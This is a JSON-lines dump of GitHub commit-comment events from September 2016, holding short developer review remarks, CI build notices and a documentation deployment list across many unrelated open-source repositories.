{"id":"4530365364","type":"CommitCommentEvent","actor":{"login":"MaximeGILLET"},"repo":{"name":"MaximeGILLET/Quotes"},"payload":{"comment":{"id":18935979,"position":null,"line":null,"path":null,"commit_id":"b9a4ddfca637c8d72ecea2131785d7080cdf4447","created_at":"2016-09-07T21:24:17Z","updated_at":"2016-09-07T21:24:17Z","body":"Je compte faire un brief/code review vendredi pour ré-expliquer un peu le framework et présenter où on en est, où on va.\r\net surtout savoir qui veut faire quoi niveau features.\r\n"}},"created_at":"2016-09-07T21:24:17Z"}
{"id":"4530370491","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":18935994,"position":null,"line":null,"path":null,"commit_id":"e3485a679046b9cea78ffef665c6ce051442d5a8","created_at":"2016-09-07T21:25:14Z","updated_at":"2016-09-07T21:25:14Z","body":"fast-forwarding develop-2.2 to borshop-integration-857-fd-eleveldb-dep = db8c8122"}},"created_at":"2016-09-07T21:25:14Z"}
{"id":"4530371099","type":"CommitCommentEvent","actor":{"login":"Markegan1"},"repo":{"name":"Markegan1/markegan.github.io"},"payload":{"comment":{"id":18935996,"position":null,"line":null,"path":null,"commit_id":"3699daef4384b1ffcce3de40b8f5f0f79d8b5893","created_at":"2016-09-07T21:25:20Z","updated_at":"2016-09-07T21:25:20Z","body":"k"}},"created_at":"2016-09-07T21:25:20Z"}
{"id":"4530372079","type":"CommitCommentEvent","actor":{"login":"Flarp"},"repo":{"name":"Kurimizumi/Honeybee-Web"},"payload":{"comment":{"id":18936000,"position":null,"line":null,"path":null,"commit_id":"d4b0dd98528ae3fe395759a9281ce3cdfddeb3fb","created_at":"2016-09-07T21:25:30Z","updated_at":"2016-09-07T21:25:30Z","body":"#2 "}},"created_at":"2016-09-07T21:25:30Z"}
{"id":"4530375662","type":"CommitCommentEvent","actor":{"login":"Seliro"},"repo":{"name":"Seliro/theforgottenserver-7.4"},"payload":{"comment":{"id":18936005,"position":null,"line":null,"path":null,"commit_id":"1871d44c18c9a7c276b7abe25999775bf2338e43","created_at":"2016-09-07T21:26:09Z","updated_at":"2016-09-07T21:26:09Z","body":"![img](http://i.imgur.com/Quktv24.jpg)"}},"created_at":"2016-09-07T21:26:09Z"}
{"id":"4530377768","type":"CommitCommentEvent","actor":{"login":"davids5"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":18936014,"position":1,"line":1,"path":"cmake/configs/nuttx_crazyflie_default.cmake","commit_id":"1b4dabea9f018d406bea8d3453b2a0566c787ab1","created_at":"2016-09-07T21:26:31Z","updated_at":"2016-09-07T21:26:31Z","body":"@dennisss \r\n\r\nThere was a change in upstream Nuttx - and I forgot to refactor for it!\r\n Change  FIONWRITE to FIONSPACE in mavlink\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-07T21:26:31Z"}
{"id":"4530381246","type":"CommitCommentEvent","actor":{"login":"artrag"},"repo":{"name":"artrag/transballmsx"},"payload":{"comment":{"id":18936025,"position":8,"line":92,"path":"src/transball-sprites.asm","commit_id":"4dce18999746317baee815507fae429b7931bb88","created_at":"2016-09-07T21:27:11Z","updated_at":"2016-09-07T21:27:11Z","body":"use dec a instead of cp 1"}},"created_at":"2016-09-07T21:27:11Z"}
{"id":"4530383767","type":"CommitCommentEvent","actor":{"login":"artrag"},"repo":{"name":"artrag/transballmsx"},"payload":{"comment":{"id":18936032,"position":35,"line":165,"path":"src/transball-sprites.asm","commit_id":"4dce18999746317baee815507fae429b7931bb88","created_at":"2016-09-07T21:27:39Z","updated_at":"2016-09-07T21:27:39Z","body":"use dec a instead of cp 1"}},"created_at":"2016-09-07T21:27:39Z"}
{"id":"4530384795","type":"CommitCommentEvent","actor":{"login":"artrag"},"repo":{"name":"artrag/transballmsx"},"payload":{"comment":{"id":18936034,"position":53,"line":259,"path":"src/transball-sprites.asm","commit_id":"4dce18999746317baee815507fae429b7931bb88","created_at":"2016-09-07T21:27:50Z","updated_at":"2016-09-07T21:27:50Z","body":"use dec a instead of cp 1"}},"created_at":"2016-09-07T21:27:50Z"}
{"id":"4530385815","type":"CommitCommentEvent","actor":{"login":"nabijaczleweli"},"repo":{"name":"kbknapp/clap-rs"},"payload":{"comment":{"id":18936040,"position":8,"line":372,"path":"src/app/help.rs","commit_id":"c76785239fd42adc8ca04f9202b6fec615aa9f14","created_at":"2016-09-07T21:28:01Z","updated_at":"2016-09-07T21:28:01Z","body":"Yeah, unconditional replace has more or equal performance in the general case"}},"created_at":"2016-09-07T21:28:01Z"}
{"id":"4530385959","type":"CommitCommentEvent","actor":{"login":"artrag"},"repo":{"name":"artrag/transballmsx"},"payload":{"comment":{"id":18936041,"position":81,"line":372,"path":"src/transball-sprites.asm","commit_id":"4dce18999746317baee815507fae429b7931bb88","created_at":"2016-09-07T21:28:03Z","updated_at":"2016-09-07T21:28:03Z","body":"use dec a instead of cp 1"}},"created_at":"2016-09-07T21:28:03Z"}
{"id":"4530396059","type":"CommitCommentEvent","actor":{"login":"wow1881"},"repo":{"name":"wow1881/flybu-hangman"},"payload":{"comment":{"id":18936068,"position":null,"line":null,"path":null,"commit_id":"633df2bc6041ff137483e2a8885895aba0ec74a2","created_at":"2016-09-07T21:30:00Z","updated_at":"2016-09-07T21:30:00Z","body":"np! :D"}},"created_at":"2016-09-07T21:30:00Z"}
{"id":"4530396149","type":"CommitCommentEvent","actor":{"login":"nikitok"},"repo":{"name":"Gdimitron/PiCollectionDeviantArtPlugin"},"payload":{"comment":{"id":18936069,"position":null,"line":null,"path":null,"commit_id":"0f8aba30067e08bd17d6b7a98908aec20e114a7c","created_at":"2016-09-07T21:30:01Z","updated_at":"2016-09-07T21:30:01Z","body":"да уж"}},"created_at":"2016-09-07T21:30:01Z"}
{"id":"4530398777","type":"CommitCommentEvent","actor":{"login":"burak13"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":18936073,"position":null,"line":null,"path":null,"commit_id":"340b8e447e859d2d9f39230393a55745c045d848","created_at":"2016-09-07T21:30:30Z","updated_at":"2016-09-07T21:30:30Z","body":"@mcostalba Among amazing works, we forgot this one! It looks like it's ELO neutral at lower threads and considerable ELO gain at higher threads! So, what are we going to do with this one?"}},"created_at":"2016-09-07T21:30:30Z"}
{"id":"4530398778","type":"CommitCommentEvent","actor":{"login":"ThomHPL"},"repo":{"name":"ThomHPL/BaseI6_updater"},"payload":{"comment":{"id":18936074,"position":null,"line":null,"path":null,"commit_id":"36dba9410fb5a07dbc9c14da1b4f2f43a3aee63a","created_at":"2016-09-07T21:30:30Z","updated_at":"2016-09-07T21:30:30Z","body":"@impressiver As soon as I finish my new installation of windows and to sort my backup of files I'll be happy to share them.  Basically it performs a CRC CCITT checksum on a fraction of the binaries, and place it at the right place in the binaries, but I need to check my files to have more details"}},"created_at":"2016-09-07T21:30:30Z"}
{"id":"4530399574","type":"CommitCommentEvent","actor":{"login":"adamschwartz"},"repo":{"name":"EagerIO/EmbedBox"},"payload":{"comment":{"id":18936076,"position":null,"line":null,"path":null,"commit_id":"015a2c6846df1c15ad357b27e446223531a475f9","created_at":"2016-09-07T21:30:38Z","updated_at":"2016-09-07T21:30:38Z","body":"👍 "}},"created_at":"2016-09-07T21:30:38Z"}
{"id":"4530400516","type":"CommitCommentEvent","actor":{"login":"oKcerG"},"repo":{"name":"oKcerG/SortFilterProxyModel"},"payload":{"comment":{"id":18936078,"position":null,"line":null,"path":null,"commit_id":"45d16933c39ac30fdf88955649919647d036df6e","created_at":"2016-09-07T21:30:48Z","updated_at":"2016-09-07T21:30:48Z","body":"Fix for #6 not #7, my bad"}},"created_at":"2016-09-07T21:30:48Z"}
{"id":"4530403319","type":"CommitCommentEvent","actor":{"login":"DanTheMan827"},"repo":{"name":"ApacheThunder/NTR_Launcher"},"payload":{"comment":{"id":18936084,"position":5,"line":5,"path":"Makefile","commit_id":"96f1e7275982b78acb9b2ea898cc692f7d9f6fd5","created_at":"2016-09-07T21:31:19Z","updated_at":"2016-09-07T21:31:19Z","body":"This is purely cosmetic but it messes up code highlighting in some editors"}},"created_at":"2016-09-07T21:31:19Z"}
{"id":"4530404729","type":"CommitCommentEvent","actor":{"login":"Nehpys"},"repo":{"name":"Regalis11/scpcb"},"payload":{"comment":{"id":18936089,"position":null,"line":null,"path":null,"commit_id":"7b8ac83dbf8ceb2df50473aadb3d9e2b33801b14","created_at":"2016-09-07T21:31:36Z","updated_at":"2016-09-07T21:31:36Z","body":"\"Or RN$ = \"gateaentrance\"\"\r\n\r\ndoesn't it do the same at Gate B, and Mark made it consistent by adding that?"}},"created_at":"2016-09-07T21:31:36Z"}
{"id":"4530410126","type":"CommitCommentEvent","actor":{"login":"mli"},"repo":{"name":"tornadomeet/ResNet"},"payload":{"comment":{"id":18936100,"position":51,"line":83,"path":"train_resnet.py","commit_id":"2042cc9fccab0bd488e93ed1311328b1de8eea48","created_at":"2016-09-07T21:32:39Z","updated_at":"2016-09-07T21:32:39Z","body":"i guess to write thing in this way:\r\n\r\naug0 = {'random_h':0, ...}\r\naug1 = {'random_h':36, ..}\r\n\r\naug = aug0 if ... else aug1\r\n\r\nthen use **aug to pass arguments into ImageRecordIter"}},"created_at":"2016-09-07T21:32:39Z"}
{"id":"4530412088","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill"},"payload":{"comment":{"id":18936104,"position":39,"line":520,"path":"payment/src/main/java/org/killbill/billing/payment/core/PaymentProcessor.java","commit_id":"43550c3ff7454265054c68c202e5b5fcd79c5d75","created_at":"2016-09-07T21:33:01Z","updated_at":"2016-09-07T21:33:01Z","body":"Agreed that we don't need:\r\n\r\n```\r\npaymentTransactionModelDao.getTransactionExternalKey().equals(paymentStateContext.getPaymentTransactionExternalKey())\r\n```\r\n\r\nHowever, we still need to check on the `account_record_id`, no?\r\n\r\nHere is the query for reference:\r\n\r\n```\r\ngetPaymentTransactionsByExternalKey() ::= <<\r\nselect\r\n<allTableFields(\"\")>\r\nfrom <tableName()>\r\nwhere transaction_external_key = :transactionExternalKey\r\n<AND_CHECK_TENANT()>\r\n<defaultOrderBy()>\r\n;\r\n>>\r\n```"}},"created_at":"2016-09-07T21:33:01Z"}
{"id":"4530412838","type":"CommitCommentEvent","actor":{"login":"Gobberwart"},"repo":{"name":"sohje/PokemonGo-Bot"},"payload":{"comment":{"id":18936105,"position":21,"line":17,"path":"pokemongo_bot/cell_workers/update_live_stats.py","commit_id":"4ca79b24cb041fab9a4b4e72eb178354a8eebdea","created_at":"2016-09-07T21:33:11Z","updated_at":"2016-09-07T21:33:11Z","body":"Yeah but it doesn't raise a FileIOException"}},"created_at":"2016-09-07T21:33:11Z"}
{"id":"4530418860","type":"CommitCommentEvent","actor":{"login":"davids5"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":18936130,"position":1,"line":1,"path":"cmake/configs/nuttx_crazyflie_default.cmake","commit_id":"1b4dabea9f018d406bea8d3453b2a0566c787ab1","created_at":"2016-09-07T21:34:22Z","updated_at":"2016-09-07T21:34:22Z","body":"see https://github.com/PX4/Firmware/commit/09b3dc864473f7a0931ece7769aa2cc212e6225c\r\n"}},"created_at":"2016-09-07T21:34:22Z"}
{"id":"4530422093","type":"CommitCommentEvent","actor":{"login":"johnthagen"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":18936138,"position":null,"line":null,"path":null,"commit_id":"8536a96ab9ef370b828d6ccb1e9e8fd2d4f19e9e","created_at":"2016-09-07T21:35:00Z","updated_at":"2016-09-07T21:35:00Z","body":":heart_decoration: This fixed tons of unresolved references in certain third party crates.  Thank you!"}},"created_at":"2016-09-07T21:35:00Z"}
{"id":"4530437568","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18936192,"position":null,"line":null,"path":null,"commit_id":"ac2dd1a8b12a39c2fd64bc20d049511ffa836ee8","created_at":"2016-09-07T21:38:08Z","updated_at":"2016-09-07T21:38:08Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [source/_views/default.html](https://github.com/pantheon-systems/documentation/commit/31b2d2154d95e55a9ec3fdf1052de671ceb49593/source/_views/default.html)\n- [source/_views/terminuspage.html](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/_views/terminuspage.html)\n- [source/docs/_terminuspages/03-examples.html](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/03-examples.html)\n- [source/docs/_terminuspages/03-examples.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/03-examples.md)\n- [source/docs/_terminuspages/04-extend.html](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/04-extend.html)\n- [source/docs/_terminuspages/04-extend.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/04-extend.md)\n- [source/docs/_terminuspages/05-commands.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/05-commands.md)\n- [source/docs/_terminuspages/05-plugins.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/05-plugins.md)\n- [source/docs/_terminuspages/06-commands.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/06-commands.md)\n- [source/docs/_terminuspages/06-versions.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/06-versions.md)\n- [source/docs/_terminuspages/07-versions.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/07-versions.md)\n- [source/docs/assets/css/main.css](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/assets/css/main.css)\n- [app/config/sculpin_site.yml](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/app/config/sculpin_site.yml)\n- [source/_partials/terminus_navbar.html](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/_partials/terminus_navbar.html)\n- [source/docs/_terminuspages/01-getting-started.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/01-getting-started.md)\n- [source/docs/_terminuspages/02-install.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/02-install.md)\n- [source/docs/_terminuspages/commands.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/commands.md)\n- [source/docs/_terminuspages/contribute.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/contribute.md)\n- [source/docs/_terminuspages/contribute/style-guide.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/contribute/style-guide.md)\n- [source/docs/_terminuspages/examples.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/examples.md)\n- [source/docs/_terminuspages/extend.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/extend.md)\n- [source/docs/_terminuspages/extend/create-plugins.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/extend/create-plugins.md)\n- [source/docs/_terminuspages/extend/plugins.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/extend/plugins.md)\n- [source/docs/_terminuspages/getting-started.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/getting-started.md)\n- [source/docs/_terminuspages/install.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/install.md)\n- [source/docs/_terminuspages/versions.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/versions.md)\n- [scripts/deploy-multidev.sh](https://github.com/pantheon-systems/documentation/commit/654a8bf1b495c39f03d762862684f1e500a09e5f/scripts/deploy-multidev.sh)\n- [app/config/sculpin_kernel.yml](https://github.com/pantheon-systems/documentation/commit/b9012bdaf01fd6e08552890ac573aca2757d8f35/app/config/sculpin_kernel.yml)\n- [app/config/sculpin_services.yml](https://github.com/pantheon-systems/documentation/commit/b9012bdaf01fd6e08552890ac573aca2757d8f35/app/config/sculpin_services.yml)\n- [docs/guides/terminus](https://terminusma-static-docs.pantheonsite.io/docs/guides/terminus)\n- [docs/terminus/commands](https://terminusma-static-docs.pantheonsite.io/docs/terminus/commands)\n- [docs/terminus/examples](https://terminusma-static-docs.pantheonsite.io/docs/terminus/examples)\n- [docs/terminus/install](https://terminusma-static-docs.pantheonsite.io/docs/terminus/install)\n- [source/_partials/contributor_box.twig](https://github.com/pantheon-systems/documentation/commit/b9012bdaf01fd6e08552890ac573aca2757d8f35/source/_partials/contributor_box.twig)\n- [source/_partials/footer_scripts.html](https://github.com/pantheon-systems/documentation/commit/b9012bdaf01fd6e08552890ac573aca2757d8f35/source/_partials/footer_scripts.html)\n- [source/_views/posts.html](https://github.com/pantheon-systems/documentation/commit/b9012bdaf01fd6e08552890ac573aca2757d8f35/source/_views/posts.html)\n- [source/_views/taxon.html](https://github.com/pantheon-systems/documentation/commit/b9012bdaf01fd6e08552890ac573aca2757d8f35/source/_views/taxon.html)\n"}},"created_at":"2016-09-07T21:38:08Z"}
{"id":"4530440968","type":"CommitCommentEvent","actor":{"login":"aronasorman"},"repo":{"name":"jayoshih/content-curation"},"payload":{"comment":{"id":18936201,"position":7,"line":139,"path":"contentcuration/contentcuration/api.py","commit_id":"042f7c1abe5a5546f0ba7972481c143fee6be21f","created_at":"2016-09-07T21:38:46Z","updated_at":"2016-09-07T21:38:46Z","body":"delete"}},"created_at":"2016-09-07T21:38:46Z"}
{"id":"4530446244","type":"CommitCommentEvent","actor":{"login":"sev-"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":18936213,"position":14,"line":375,"path":"engines/wintermute/detection_tables.h","commit_id":"710ba72039f40e6d74f081fe1e84ad3228840fbf","created_at":"2016-09-07T21:39:48Z","updated_at":"2016-09-07T21:39:48Z","body":"Please take a note of the formatting which is at the previous entry. We're surrounding the operators with spaces. In this case it is the 'binary or' operator."}},"created_at":"2016-09-07T21:39:48Z"}
{"id":"4530451411","type":"CommitCommentEvent","actor":{"login":"spike11302000"},"repo":{"name":"Codepixl/GLCraft"},"payload":{"comment":{"id":18936233,"position":null,"line":null,"path":null,"commit_id":"cf9be5f167c092fcf867af56a37e2a51b417ae38","created_at":"2016-09-07T21:40:49Z","updated_at":"2016-09-07T21:40:49Z","body":"i just copy the coal for some reason..."}},"created_at":"2016-09-07T21:40:49Z"}
{"id":"4530451487","type":"CommitCommentEvent","actor":{"login":"sev-"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":18936234,"position":27,"line":119,"path":"engines/wintermute/wintermute.cpp","commit_id":"710ba72039f40e6d74f081fe1e84ad3228840fbf","created_at":"2016-09-07T21:40:49Z","updated_at":"2016-09-07T21:40:49Z","body":"This is formatted incorrectly. It should be '} else {'"}},"created_at":"2016-09-07T21:40:49Z"}
{"id":"4530454553","type":"CommitCommentEvent","actor":{"login":"spike11302000"},"repo":{"name":"Codepixl/GLCraft"},"payload":{"comment":{"id":18936242,"position":null,"line":null,"path":null,"commit_id":"cf9be5f167c092fcf867af56a37e2a51b417ae38","created_at":"2016-09-07T21:41:28Z","updated_at":"2016-09-07T21:41:28Z","body":"i going to try to dual windows with ubuntu"}},"created_at":"2016-09-07T21:41:28Z"}
{"id":"4530457022","type":"CommitCommentEvent","actor":{"login":"william-ferguson-au"},"repo":{"name":"ACRA/acra"},"payload":{"comment":{"id":18936248,"position":122,"line":164,"path":"src/main/java/org/acra/util/IOUtils.java","commit_id":"7fe71d52d543fead39c43bddbfd54b835d52ff47","created_at":"2016-09-07T21:41:57Z","updated_at":"2016-09-07T21:41:57Z","body":"Good pickup, thanks. "}},"created_at":"2016-09-07T21:41:57Z"}
{"id":"4530457872","type":"CommitCommentEvent","actor":{"login":"voron00"},"repo":{"name":"Grarak/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":18936251,"position":null,"line":null,"path":null,"commit_id":"0b4619ee896e308d0e8de0c6bd22fa0daa99cf14","created_at":"2016-09-07T21:42:08Z","updated_at":"2016-09-07T21:42:08Z","body":"It also seems that cm has moved thier VibratorHW implentation to chhw. See bacon https://github.com/CyanogenMod/android_device_oneplus_bacon/commit/f789a971132419c5d897c837ea87fd99f02a95a1. Although we still have it im not exactly sure if we need to remove it as in bacon."}},"created_at":"2016-09-07T21:42:08Z"}
{"id":"4530459795","type":"CommitCommentEvent","actor":{"login":"federicoiosue"},"repo":{"name":"jfreax/Omni-Notes"},"payload":{"comment":{"id":18936259,"position":null,"line":null,"path":null,"commit_id":"06e3c3e1a04d32afd12295857efd4047db1f2559","created_at":"2016-09-07T21:42:29Z","updated_at":"2016-09-07T21:42:29Z","body":"Really a great improvement over the outdated wanna-be-meterial layout previously used."}},"created_at":"2016-09-07T21:42:29Z"}
{"id":"4530464422","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":18936268,"position":null,"line":null,"path":null,"commit_id":"e6a66f7af5b928672d52a650489b473a9c00f775","created_at":"2016-09-07T21:43:21Z","updated_at":"2016-09-07T21:43:21Z","body":"let me know when this area is finished, I'm planning on making available several advanced settings."}},"created_at":"2016-09-07T21:43:21Z"}
{"id":"4530467235","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18936280,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T21:43:54Z","updated_at":"2016-09-07T21:43:54Z","body":"Guys, I almost have it. "}},"created_at":"2016-09-07T21:43:54Z"}
{"id":"4530474839","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18936297,"position":null,"line":null,"path":null,"commit_id":"c8752e35e5dd66c886cb982988c6f17d59bb7015","created_at":"2016-09-07T21:45:26Z","updated_at":"2016-09-07T21:45:26Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 19](http://teamcity.otenv.com/viewLog.html?buildId=5180942&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-07T21:45:26Z"}
{"id":"4530475405","type":"CommitCommentEvent","actor":{"login":"reefdog"},"repo":{"name":"documentcloud/documentcloud"},"payload":{"comment":{"id":18936298,"position":null,"line":null,"path":null,"commit_id":"782df9589dac363ef9c9fd75437ec52dc85eb92a","created_at":"2016-09-07T21:45:33Z","updated_at":"2016-09-07T21:45:33Z","body":"👆 don't worry, that's not the upload iframe."}},"created_at":"2016-09-07T21:45:33Z"}
{"id":"4530478557","type":"CommitCommentEvent","actor":{"login":"kbknapp"},"repo":{"name":"kbknapp/clap-rs"},"payload":{"comment":{"id":18936305,"position":8,"line":372,"path":"src/app/help.rs","commit_id":"c76785239fd42adc8ca04f9202b6fec615aa9f14","created_at":"2016-09-07T21:46:12Z","updated_at":"2016-09-07T21:46:12Z","body":"@vks @nabijaczleweli I agree...I'm not sure why I wrote it like that other than lack of thinking much about it. We can change that on the next PR, or someone would like to throw a quick commit together I'm good with it."}},"created_at":"2016-09-07T21:46:12Z"}
{"id":"4530479033","type":"CommitCommentEvent","actor":{"login":"gianlucaborello"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18936307,"position":55,"line":114,"path":"sdcclient.py","commit_id":"95cb6ec1fda4583367d4cf6208f18511241a7106","created_at":"2016-09-07T21:46:17Z","updated_at":"2016-09-07T21:46:17Z","body":"You are right, we moved to a newer and more powerful API for handling notification settings, which are now called notification channels. I added a couple methods here as well as an example https://github.com/draios/python-sdc-client/commit/9a801dc4a097329027f6741e19ae517b9043fe27 (we support multiple notification channels, I added just the email for now, but will expand the others soon)"}},"created_at":"2016-09-07T21:46:17Z"}
{"id":"4530482509","type":"CommitCommentEvent","actor":{"login":"auser"},"repo":{"name":"IjzerenHein/react-native-firestack"},"payload":{"comment":{"id":18936322,"position":null,"line":null,"path":null,"commit_id":"3ddc98005c27e0e80bff753a8cd3c795c3c8aec8","created_at":"2016-09-07T21:47:03Z","updated_at":"2016-09-07T21:47:03Z","body":"Awesome.\r\n\r\n1. I can help with Android version (unless you want to add it, either way)\r\n2. For source-maps, I think the react runner runs a source map by default, perhaps we can use this source-map? I will need to do more investigation to understand how that works\r\n3. Awesome. Perhaps we can provide a function to handle logging, rather than needing to intercept all `console.log()` statements. It might be more direct, this way?\r\n4. The `Crash` module, as you've built has access to all of the configuration options from Firestack through `this.firestack.options`, if we want to capture them from there. "}},"created_at":"2016-09-07T21:47:03Z"}
{"id":"4530482918","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18936324,"position":null,"line":null,"path":null,"commit_id":"c8752e35e5dd66c886cb982988c6f17d59bb7015","created_at":"2016-09-07T21:47:09Z","updated_at":"2016-09-07T21:47:09Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 19](http://teamcity.otenv.com/viewLog.html?buildId=5180942&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 9 Build time: 00:01:43"}},"created_at":"2016-09-07T21:47:09Z"}
{"id":"4530483333","type":"CommitCommentEvent","actor":{"login":"kbknapp"},"repo":{"name":"kbknapp/clap-rs"},"payload":{"comment":{"id":18936326,"position":44,"line":933,"path":"src/app/help.rs","commit_id":"c76785239fd42adc8ca04f9202b6fec615aa9f14","created_at":"2016-09-07T21:47:14Z","updated_at":"2016-09-07T21:47:14Z","body":"It could be, typically once I comment out code I'll leave it for a single patch release cycle in case bugs pop up from the change then I remove it. I know I can go back in git history, but this is a quick way to see what I was working on."}},"created_at":"2016-09-07T21:47:14Z"}
{"id":"4530490458","type":"CommitCommentEvent","actor":{"login":"stubailo"},"repo":{"name":"graphql/graphql.github.io"},"payload":{"comment":{"id":18936349,"position":null,"line":null,"path":null,"commit_id":"1ab30a72d0d7d86d8d90bc57bed5235cd0d6ddc9","created_at":"2016-09-07T21:48:43Z","updated_at":"2016-09-07T21:48:43Z","body":"Should we move the Learn-Queries and Learn-Schema into this folder as well? Honestly I don't really know how to get the sidebar to work etc. so I could definitely use some help."}},"created_at":"2016-09-07T21:48:43Z"}
{"id":"4530491748","type":"CommitCommentEvent","actor":{"login":"aszczecinski"},"repo":{"name":"BartlomiejAdamiak/JavaApiDoGier"},"payload":{"comment":{"id":18936355,"position":null,"line":null,"path":null,"commit_id":"29716e0c17c1123f1ac72baddcddb0c66f018f42","created_at":"2016-09-07T21:48:59Z","updated_at":"2016-09-07T21:48:59Z","body":"Fail merge... "}},"created_at":"2016-09-07T21:48:59Z"}
{"id":"4530492684","type":"CommitCommentEvent","actor":{"login":"spencergibb"},"repo":{"name":"spring-cloud/spring-cloud-contract"},"payload":{"comment":{"id":18936358,"position":1,"line":1,"path":"spring-cloud-contract-dependencies/.factorypath","commit_id":"ff48c5dbdaadee9e8a147c13a58a33ecf98ba408","created_at":"2016-09-07T21:49:11Z","updated_at":"2016-09-07T21:49:11Z","body":"What's `.factorypath`?"}},"created_at":"2016-09-07T21:49:11Z"}
{"id":"4530495643","type":"CommitCommentEvent","actor":{"login":"zero323"},"repo":{"name":"awesome-spark/spark-gotchas"},"payload":{"comment":{"id":18936365,"position":null,"line":null,"path":null,"commit_id":"1556d9f0bf225048bc773294b8ee5e15ff826d86","created_at":"2016-09-07T21:49:47Z","updated_at":"2016-09-07T21:49:47Z","body":"So where would you put it? It is not really reproducible outside RDD API and you know I am not very fond of this \"by example\" idea.\r\n\r\nDo you think about separate chapter? Architecture?"}},"created_at":"2016-09-07T21:49:47Z"}
{"id":"4530501283","type":"CommitCommentEvent","actor":{"login":"CassianoViana"},"repo":{"name":"cesarviana/portugol"},"payload":{"comment":{"id":18936379,"position":null,"line":null,"path":null,"commit_id":"94634695374764659f0a099ed64b8d8e7c40d4e1","created_at":"2016-09-07T21:50:56Z","updated_at":"2016-09-07T21:50:56Z","body":"ó que bunito"}},"created_at":"2016-09-07T21:50:56Z"}
